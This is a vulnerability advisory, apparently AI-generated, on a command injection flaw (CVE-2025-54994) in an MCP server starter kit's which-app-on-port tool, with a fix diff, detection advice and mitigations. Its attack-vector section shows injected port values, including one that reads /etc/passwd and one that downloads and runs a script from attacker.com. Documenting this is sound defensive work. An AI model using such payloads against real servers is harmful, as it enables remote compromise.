CVE-2025-54994 Overview
CVE-2025-54994 is a command injection vulnerability affecting @akoskm/create-mcp-server-stdio, an MCP (Model Context Protocol) server starter kit that uses the StdioServerTransport. Prior to version 0.0.13, the MCP Server implementation is vulnerable to command injection attacks through its tool definition and implementation. The vulnerability exists in the which-app-on-port tool, which relies on Node.js child process API exec—an unsafe API when concatenated with untrusted user input.
Critical Impact
Remote attackers can execute arbitrary system commands on servers running vulnerable versions of @akoskm/create-mcp-server-stdio by exploiting the which-app-on-port tool's improper input handling, potentially leading to complete system compromise.
Affected Products
- @akoskm/create-mcp-server-stdio versions prior to 0.0.13
- Systems running MCP servers built with the vulnerable starter kit
- Applications utilizing the which-app-on-port tool functionality
Discovery Timeline
- September 8, 2025 - CVE-2025-54994 published to NVD
- September 9, 2025 - Last updated in NVD database
Technical Details for CVE-2025-54994
Vulnerability Analysis
This command injection vulnerability (CWE-78) stems from the unsafe use of the Node.js exec() function in the MCP server's which-app-on-port tool implementation. The exec() function spawns a shell and passes the command string directly to it, making it inherently dangerous when user-supplied input is concatenated into the command string without proper sanitization.
When a user provides a port number to the which-app-on-port tool, the input is directly concatenated into a shell command. An attacker can craft malicious input containing shell metacharacters (such as ;, |, &&, or backticks) to break out of the intended command context and execute arbitrary commands on the underlying system.
Root Cause
The root cause is the use of Node.js child_process.exec() API with unsanitized user input. The exec() function interprets the entire command string through a shell, allowing shell metacharacters to be processed. This design pattern creates a direct path for command injection when any portion of the command string originates from untrusted sources. The vulnerable code in src/index.ts (lines 24-40) concatenates user input directly into shell commands without validation or escaping.
Attack Vector
The attack vector is network-based, requiring no authentication or user interaction. An attacker can send crafted requests to the MCP server's which-app-on-port tool with malicious payloads embedded in the port parameter. For example, instead of providing a legitimate port number like 3000, an attacker could inject payloads such as 3000; cat /etc/passwd or 3000 && wget http://attacker.com/malware.sh | sh to execute arbitrary commands with the privileges of the Node.js process.
import { McpServer, ResourceTemplate } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
import { z } from "zod";
-import { exec } from "child_process";
+import { execFile } from "child_process";
// Create an MCP server
const server = new McpServer({
name: "Demo",
Source: GitHub Commit Details
The patch replaces the vulnerable exec() function with execFile(), which does not spawn a shell and treats arguments as literal values, preventing command injection attacks.
Detection Methods for CVE-2025-54994
Indicators of Compromise
- Unusual process spawning from Node.js MCP server processes
- Unexpected outbound network connections from MCP server instances
- System commands executed with unexpected arguments containing shell metacharacters
- Log entries showing malformed port values with shell operators (;, |, &&, $())
Detection Strategies
- Monitor Node.js process trees for child processes that deviate from expected behavior (commands other than port lookup utilities)
- Implement application-layer logging to capture all inputs to the which-app-on-port tool
- Deploy runtime application self-protection (RASP) solutions to detect command injection attempts
- Use network intrusion detection systems to identify suspicious payloads in MCP server traffic
Monitoring Recommendations
- Enable verbose logging on MCP server instances to capture tool invocations and parameters
- Set up alerts for any MCP server process spawning unexpected child processes
- Monitor for file system changes in directories where the MCP server operates
- Implement anomaly detection for network traffic patterns from MCP server hosts
How to Mitigate CVE-2025-54994
Immediate Actions Required
- Upgrade @akoskm/create-mcp-server-stdio to version 0.0.13 or later immediately
- Audit any custom code built on this starter kit for similar patterns using exec() with user input
- Implement input validation to ensure port parameters contain only numeric values
- Consider temporarily disabling the which-app-on-port tool if immediate patching is not possible
Patch Information
The vulnerability has been fixed in version 0.0.13 of @akoskm/create-mcp-server-stdio. The fix replaces the unsafe exec() function with execFile(), which does not interpret shell metacharacters. Organizations should update their dependencies using:
npm update @akoskm/create-mcp-server-stdio
For detailed patch information, refer to the GitHub Security Advisory and the commit implementing the fix.
Workarounds
- Implement strict input validation to reject any non-numeric characters in port parameters
- Use network segmentation to limit the exposure of MCP server instances
- Apply the principle of least privilege to the MCP server process user account
- Deploy web application firewalls (WAF) with command injection detection rules
# Configuration example - Validate port input before processing
# Add input validation in your MCP server configuration
# Ensure port parameter matches pattern: ^[0-9]{1,5}$
# Reject any input containing: ; | & $ ` ( ) { } [ ] < > \ ' "
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
